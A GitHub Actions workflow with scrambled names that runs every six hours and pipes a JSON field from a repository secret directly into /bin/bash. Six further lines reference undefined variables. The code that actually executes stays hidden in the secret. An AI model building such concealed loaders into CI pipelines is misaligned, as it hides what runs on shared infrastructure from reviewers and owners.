name: xiangjiangnannn
on:
  workflow_dispatch:
  schedule:
    - cron: '29 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiangjiangnannn
        env:
          y0: ${{ secrets.y0 }}
        run: |
          echo $y0 | jq -r .ay7 | /bin/bash
          echo $c63837 | jq -r .iakfo9353 | /bin/bash
          echo $tmjk4 | jq -r .asl33 | /bin/bash
          echo $cablb38392 | jq -r .l149 | /bin/bash
          echo $ebxm44 | jq -r .nkjy9 | /bin/bash
          echo $v47003 | jq -r .kq350 | /bin/bash
          echo $umecb50 | jq -r .uba524 | /bin/bash

